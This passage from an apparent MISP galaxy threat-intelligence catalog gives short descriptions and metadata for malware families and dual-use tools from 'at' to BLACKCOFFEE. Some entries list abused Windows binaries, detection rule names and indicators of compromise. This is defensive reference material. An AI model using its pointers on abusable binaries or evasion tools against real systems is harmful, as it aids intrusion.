| software_attack_id | S1087 |
| source | MITRE |
| tags | ['fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
at
at is used to schedule tasks on a system to run at a specified date or time.[TechNet At][Linux at]
Internal MISP references
UUID af01dc7b-a2bc-4fda-bbfe-d2be889c2860 which can be used as unique global reference for at in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS', 'Linux', 'Windows'] |
| software_attack_id | S0110 |
| source | MITRE |
| tags | ['5bc4c6c6-36df-4a53-920c-53e17d7027db', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Atbroker
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Helper binary for Assistive Technology (AT)
Author: Oddvar Moe
Paths: * C:\Windows\System32\Atbroker.exe * C:\Windows\SysWOW64\Atbroker.exe
Resources: * http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
Detection: * Sigma: proc_creation_win_lolbin_susp_atbroker.yml * Sigma: registry_event_susp_atbroker_change.yml * IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration * IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs * IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware[Atbroker.exe - LOLBAS Project]
Internal MISP references
UUID 2efae55c-86f3-4234-af26-1c75e922d81a which can be used as unique global reference for Atbroker in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5085 |
| source | Tidal Cyber |
| tags | ['85a29262-64bd-443c-9e08-3ee26aac859b', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Atera Agent
Atera Agent is a legitimate remote administration tool (specifically a remote management and maintenance ("RMM") solution) that adversaries have used as a command and control tool for remote code execution, tool ingress, and persisting in victim environments.[U.S. CISA PaperCut May 2023]
Internal MISP references
UUID f8113a9f-a706-46df-8370-a9cef1c75f30 which can be used as unique global reference for Atera Agent in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5014 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444', '9a5ed991-6fe7-49fe-8536-91defc449b18', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', '992bdd33-4a47-495d-883a-58010a2f0efb', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Attor
Attor is a Windows-based espionage platform that has been seen in use since 2013. Attor has a loadable plugin architecture to customize functionality for specific targets.[ESET Attor Oct 2019]
Internal MISP references
UUID 89c35e9f-b435-4f58-9073-f24c1ee8754f which can be used as unique global reference for Attor in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0438 |
| source | MITRE |
| type | ['malware'] |
AuditCred
AuditCred is a malicious DLL that has been used by Lazarus Group during their 2018 attacks.[TrendMicro Lazarus Nov 2018]
Internal MISP references
UUID d0c25f14-5eb3-40c1-a890-2ab1349dff53 which can be used as unique global reference for AuditCred in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0347 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
AutoIt backdoor
AutoIt backdoor is malware that has been used by the actors responsible for the MONSOON campaign. The actors frequently used it in weaponized .pps files exploiting CVE-2014-6352. [Forcepoint Monsoon] This malware makes use of the legitimate scripting language for Windows GUI automation with the same name.
Internal MISP references
UUID 3f927596-5219-49eb-bd0d-57068b0e04ed which can be used as unique global reference for AutoIt backdoor in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0129 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Automim
Researchers describe Automim as a "collection of .cmd, .vbs and .bat files that automate the execution" of the Mimikatz and LaZagne credential harvesting tools.[CrowdStrike Endpoint Security Testing Oct 2021]
Internal MISP references
UUID 984249bd-6421-4133-bd2a-25f330b4b441 which can be used as unique global reference for Automim in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5277 |
| source | Tidal Cyber |
| tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
AuTo Stealer
AuTo Stealer is malware written in C++ has been used by SideCopy since at least December 2021 to target government agencies and personnel in India and Afghanistan.[MalwareBytes SideCopy Dec 2021]
Internal MISP references
UUID 649a4cfc-c0d0-412d-a28c-1bd4ed604ea8 which can be used as unique global reference for AuTo Stealer in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1029 |
| source | MITRE |
| tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Avaddon
Avaddon is ransomware written in C++ that has been offered as Ransomware-as-a-Service (RaaS) since at least June 2020.[Awake Security Avaddon][Arxiv Avaddon Feb 2021]
Internal MISP references
UUID bad92974-35f6-4183-8024-b629140c6ee6 which can be used as unique global reference for Avaddon in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0640 |
| source | MITRE |
| tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
Avenger
Avenger is a downloader that has been used by BRONZE BUTLER since at least 2019.[Trend Micro Tick November 2019]
Internal MISP references
UUID e5ca0192-e905-46a1-abef-ce1119c1f967 which can be used as unique global reference for Avenger in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0473 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
AvosLocker
AvosLocker is ransomware written in C++ that has been offered via the Ransomware-as-a-Service (RaaS) model. It was first observed in June 2021 and has been used against financial services, critical manufacturing, government facilities, and other critical infrastructure sectors in the United States. As of March 2022, AvosLocker had also been used against organizations in Belgium, Canada, China, Germany, Saudi Arabia, Spain, Syria, Taiwan, Turkey, the United Arab Emirates, and the United Kingdom.[Malwarebytes AvosLocker Jul 2021][Trend Micro AvosLocker Apr 2022][Joint CSA AvosLocker Mar 2022]
Internal MISP references
UUID e792dc8d-b0f4-5916-8850-a61ff53125d0 which can be used as unique global reference for AvosLocker in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Linux', 'Windows'] |
| software_attack_id | S1053 |
| source | MITRE |
| tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', 'c3779a84-8132-4c62-be2f-9312ad41c273', 'ce9f1048-09c1-49b0-a109-dd604afbf3cd', 'fe3eb26d-6daa-4f82-b0dd-fc1e2fffbc2b', '9e4936f0-e3b7-4721-a638-58b2d093b2f2', '24448a05-2337-4bc9-a889-a83f2fd1f3ad', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
Azorult
Azorult is a commercial Trojan that is used to steal information from compromised hosts. Azorult has been observed in the wild as early as 2016. In July 2018, Azorult was seen used in a spearphishing campaign against targets in North America. Azorult has been seen used for cryptocurrency theft. [Unit42 Azorult Nov 2018][Proofpoint Azorult July 2018]
Internal MISP references
UUID cc68a7f0-c955-465f-bee0-2dacbb179078 which can be used as unique global reference for Azorult in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0344 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Babuk
Babuk is a Ransomware-as-a-service (RaaS) malware that has been used since at least 2021. The operators of Babuk employ a "Big Game Hunting" approach to targeting major enterprises and operate a leak site to post stolen data as part of their extortion scheme.[Sogeti CERT ESEC Babuk March 2021][McAfee Babuk February 2021][CyberScoop Babuk February 2021]
Internal MISP references
UUID 0dc07eb9-66df-4116-b1bc-7020ca6395a1 which can be used as unique global reference for Babuk in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Linux', 'Windows'] |
| software_attack_id | S0638 |
| source | MITRE |
| tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', 'b5962a84-f1c7-4d0d-985c-86301db95129', '12124060-8392-49a3-b7b7-1dde3ebc8e67', '915e7ac2-b266-45d7-945c-cb04327d6246', 'd713747c-2d53-487e-9dac-259230f04460', 'fde4c246-7d2d-4d53-938b-44651cf273f1', '964c2590-4b52-48c6-afff-9a6d72e68908', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', 'a2e000da-8181-4327-bacd-32013dbd3654'] |
| type | ['malware'] |
BabyShark
BabyShark is a Microsoft Visual Basic (VB) script-based malware family that is believed to be associated with several North Korean campaigns. [Unit42 BabyShark Feb 2019]
Internal MISP references
UUID ebb824a2-abff-4bfd-87f0-d63cb02b62e6 which can be used as unique global reference for BabyShark in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0414 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
BackConfig
BackConfig is a custom Trojan with a flexible plugin architecture that has been used by Patchwork.[Unit 42 BackConfig May 2020]
Internal MISP references
UUID 2763ad8c-cf4e-42eb-88db-a40ff8f96cf9 which can be used as unique global reference for BackConfig in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0475 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Backdoor.Oldrea
Backdoor.Oldrea is a modular backdoor that used by Dragonfly against energy companies since at least 2013. Backdoor.Oldrea was distributed via supply chain compromise, and included specialized modules to enumerate and map ICS-specific systems, processes, and protocols.[Symantec Dragonfly][Gigamon Berserk Bear October 2021][Symantec Dragonfly Sept 2017]
Internal MISP references
UUID f7cc5974-767c-4cb4-acc7-36295a386ce5 which can be used as unique global reference for Backdoor.Oldrea in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0093 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
BACKSPACE
BACKSPACE is a backdoor used by APT30 that dates back to at least 2005. [FireEye APT30]
Internal MISP references
UUID d0daaa00-68e1-4568-bb08-3f28bcd82c63 which can be used as unique global reference for BACKSPACE in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0031 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Backstab
Backstab is a tool used to terminate antimalware-protected processes.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 5a9a7a54-21cb-4a5c-bef0-d37f8678bf46 which can be used as unique global reference for Backstab in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5026 |
| source | Tidal Cyber |
| tags | ['d469efcf-4feb-4149-9c0f-c4b7821960bd', 'e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
BADCALL
BADCALL is a Trojan malware variant used by the group Lazarus Group. [US-CERT BADCALL]
Internal MISP references
UUID d7aa53a5-0912-4952-8f7f-55698e933c3b which can be used as unique global reference for BADCALL in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0245 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
BADFLICK
BADFLICK is a backdoor used by Leviathan in spearphishing campaigns first reported in 2018 that targeted the U.S. engineering and maritime industries.[FireEye Periscope March 2018][Accenture MUDCARP March 2019]
Internal MISP references
UUID 8c454294-81cb-45d0-b299-818994ad3e6f which can be used as unique global reference for BADFLICK in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0642 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
BADHATCH
BADHATCH is a backdoor that has been utilized by FIN8 since at least 2019. BADHATCH has been used to target the insurance, retail, technology, and chemical industries in the United States, Canada, South Africa, Panama, and Italy.[Gigamon BADHATCH Jul 2019][BitDefender BADHATCH Mar 2021]
Internal MISP references
UUID 16481e0f-49d5-54c1-a1fe-16d9e7f8d08c which can be used as unique global reference for BADHATCH in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1081 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
BADNEWS
BADNEWS is malware that has been used by the actors responsible for the Patchwork campaign. Its name was given due to its use of RSS feeds, forums, and blogs for command and control. [Forcepoint Monsoon] [TrendMicro Patchwork Dec 2017]
Internal MISP references
UUID 34c24d27-c779-42a4-9f61-3f0d3fea6fd4 which can be used as unique global reference for BADNEWS in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0128 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
BadPatch
BadPatch is a Windows Trojan that was used in a Gaza Hackers-linked campaign.[Unit 42 BadPatch Oct 2017]
Internal MISP references
UUID 10e76722-4b52-47f6-9276-70e95fecb26b which can be used as unique global reference for BadPatch in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0337 |
| source | MITRE |
| type | ['malware'] |
Bad Rabbit
Bad Rabbit is a self-propagating ransomware that affected the Ukrainian transportation sector in 2017. Bad Rabbit has also targeted organizations and consumers in Russia. [Secure List Bad Rabbit][ESET Bad Rabbit][Dragos IT ICS Ransomware]
Internal MISP references
UUID a1d86d8f-fa48-43aa-9833-7355750e455c which can be used as unique global reference for Bad Rabbit in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0606 |
| source | MITRE |
| tags | ['5a463cb3-451d-47f7-93e4-1886150697ce', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Bandook
Bandook is a commercially available RAT, written in Delphi and C++, that has been available since at least 2007. It has been used against government, financial, energy, healthcare, education, IT, and legal organizations in the US, South America, Europe, and Southeast Asia. Bandook has been used by Dark Caracal, as well as in a separate campaign referred to as "Operation Manul".[EFF Manul Aug 2016][Lookout Dark Caracal Jan 2018][CheckPoint Bandook Nov 2020]
Internal MISP references
UUID 5c0f8c35-88ff-40a1-977a-af5ce534e932 which can be used as unique global reference for Bandook in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0234 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Bankshot
Bankshot is a remote access tool (RAT) that was first reported by the Department of Homeland Security in December of 2017. In 2018, Lazarus Group used the Bankshot implant in attacks against the Turkish financial sector. [McAfee Bankshot]
Internal MISP references
UUID 24b8471d-698f-48cc-b47a-8fbbaf28b293 which can be used as unique global reference for Bankshot in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0239 |
| source | MITRE |
| tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Bash
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: File used by Windows subsystem for Linux
Author: Oddvar Moe
Paths: * C:\Windows\System32\bash.exe * C:\Windows\SysWOW64\bash.exe
Detection: * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * Sigma: proc_creation_win_lolbin_bash.yml * IOC: Child process from bash.exe[Bash.exe - LOLBAS Project]
Internal MISP references
UUID cef3a09e-22ca-43dc-ad4a-95741a3b85ff which can be used as unique global reference for Bash in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5086 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Bat Armor
Bat Armor is a tool used to generate .bat files using PowerShell scripts.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 628037d4-962d-4f58-b32d-241d739bc62d which can be used as unique global reference for Bat Armor in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5027 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Bazar
Bazar is a downloader and backdoor that has been used since at least April 2020, with infections primarily against professional services, healthcare, manufacturing, IT, logistics and travel companies across the US and Europe. Bazar reportedly has ties to TrickBot campaigns and can be used to deploy additional malware, including ransomware, and to steal sensitive data.[Cybereason Bazar July 2020]
Internal MISP references
UUID b35d9817-6ead-4dbd-a2fa-4b8e217f8eac which can be used as unique global reference for Bazar in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0534 |
| source | MITRE |
| tags | ['818c3d93-c010-44f4-82bc-b63b4bc6c3c2', '84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
BBK
BBK is a downloader that has been used by BRONZE BUTLER since at least 2019.[Trend Micro Tick November 2019]
Internal MISP references
UUID 3daa5ae1-464e-4c0a-aa46-15264a2a0126 which can be used as unique global reference for BBK in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0470 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
BBSRAT
BBSRAT is malware with remote access tool functionality that has been used in targeted compromises. [Palo Alto Networks BBSRAT]
Internal MISP references
UUID be4dab36-d499-4ac3-b204-5e309e3a5331 which can be used as unique global reference for BBSRAT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0127 |
| source | MITRE |
| type | ['malware'] |
BendyBear
BendyBear is an x64 shellcode for a stage-zero implant designed to download malware from a C2 server. First discovered in August 2020, BendyBear shares a variety of features with Waterbear, malware previously attributed to the Chinese cyber espionage group BlackTech.[Unit42 BendyBear Feb 2021]
Internal MISP references
UUID a114a498-fcfd-4e0a-9d1e-e26750d71af8 which can be used as unique global reference for BendyBear in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0574 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Bginfo
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Background Information Utility included with SysInternals Suite
Author: Oddvar Moe
Paths: * No fixed path
Resources: * https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
Detection: * Sigma: proc_creation_win_lolbin_bginfo.yml * Elastic: defense_evasion_unusual_process_network_connection.toml * Elastic: defense_evasion_network_connection_from_windows_binary.toml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules[Bginfo.exe - LOLBAS Project]
Internal MISP references
UUID fe926654-0cff-4e8e-b192-2fa1eb8a9a67 which can be used as unique global reference for Bginfo in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5207 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
BianLian Ransomware (Backdoor)
This Software object represents the custom backdoor tool used during intrusions conducted by the BianLian Ransomware Group.[U.S. CISA BianLian Ransomware May 2023][BianLian Ransomware Gang Gives It a Go! | [redacted]]
Delivers: TeamViewer[U.S. CISA BianLian Ransomware May 2023], Atera Agent[U.S. CISA BianLian Ransomware May 2023], Splashtop[U.S. CISA BianLian Ransomware May 2023], AnyDesk[U.S. CISA BianLian Ransomware May 2023]
Internal MISP references
UUID a4fb341d-8010-433f-b8f1-a8781f961435 which can be used as unique global reference for BianLian Ransomware (Backdoor) in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5001 |
| source | Tidal Cyber |
| tags | ['35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
BISCUIT
BISCUIT is a backdoor that has been used by APT1 since as early as 2007. [Mandiant APT1]
Internal MISP references
UUID 3ad98097-2d10-4aa1-9594-7e74828a3643 which can be used as unique global reference for BISCUIT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0017 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Bisonal
Bisonal is a remote access tool (RAT) that has been used by Tonto Team against public and private sector organizations in Russia, South Korea, and Japan since at least December 2010.[Unit 42 Bisonal July 2018][Talos Bisonal Mar 2020]
Internal MISP references
UUID b898816e-610f-4c2f-9045-d9f28a54ee58 which can be used as unique global reference for Bisonal in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0268 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
BitPaymer
BitPaymer is a ransomware variant first observed in August 2017 targeting hospitals in the U.K. BitPaymer uses a unique encryption key, ransom note, and contact information for each operation. BitPaymer has several indicators suggesting overlap with the Dridex malware and is often delivered via Dridex.[Crowdstrike Indrik November 2018]
Internal MISP references
UUID e7dec940-8701-4c06-9865-5b11c61c046d which can be used as unique global reference for BitPaymer in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0570 |
| source | MITRE |
| tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
BITSAdmin
BITSAdmin is a command line tool used to create and manage BITS Jobs. [Microsoft BITSAdmin]
Internal MISP references
UUID 52a20d3d-1edd-4f17-87f0-b77c67d260b4 which can be used as unique global reference for BITSAdmin in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0190 |
| source | MITRE |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444', '10d09438-9ea5-405d-9b3a-36d351b5a5d9', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Black Basta
Black Basta is ransomware written in C++ that has been offered within the ransomware-as-a-service (RaaS) model since at least April 2022; there are variants that target Windows and VMWare ESXi servers. Black Basta operations have included the double extortion technique where in addition to demanding ransom for decrypting the files of targeted organizations the cyber actors also threaten to post sensitive information to a leak site if the ransom is not paid. Black Basta affiliates have targeted multiple high-value organizations, with the largest number of victims based in the U.S. Based on similarities in TTPs, leak sites, payment sites, and negotiation tactics, security researchers assess the Black Basta RaaS operators could include current or former members of the Conti group.[Palo Alto Networks Black Basta August 2022][Deep Instinct Black Basta August 2022][Minerva Labs Black Basta May 2022][Avertium Black Basta June 2022][NCC Group Black Basta June 2022][Cyble Black Basta May 2022]
Internal MISP references
UUID 0d5b24ba-68dc-50fa-8268-3012180fe374 which can be used as unique global reference for Black Basta in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1070 |
| source | MITRE |
| tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', 'fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444', 'dea4388a-b1f2-4f2a-9df9-108631d0d078', '2743d495-7728-4a75-9e5f-b64854039792', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
BlackCat
BlackCat is ransomware written in Rust that has been offered via the Ransomware-as-a-Service (RaaS) model. First observed November 2021, BlackCat has been used to target multiple sectors and organizations in various countries and regions in Africa, the Americas, Asia, Australia, and Europe.[Microsoft BlackCat Jun 2022][Sophos BlackCat Jul 2022][ACSC BlackCat Apr 2022]
Internal MISP references
UUID 691369e5-ef74-5ff9-bc20-34efeb4b6c5b which can be used as unique global reference for BlackCat in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Linux', 'Windows'] |
| software_attack_id | S1068 |
| source | MITRE |
| tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '5e7433ad-a894-4489-93bc-41e90da90019', '15787198-6c8b-4f79-bf50-258d55072fee', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
BLACKCOFFEE
BLACKCOFFEE is malware that has been used by several Chinese groups since at least 2013. [FireEye APT17] [FireEye Periscope March 2018]
Internal MISP references
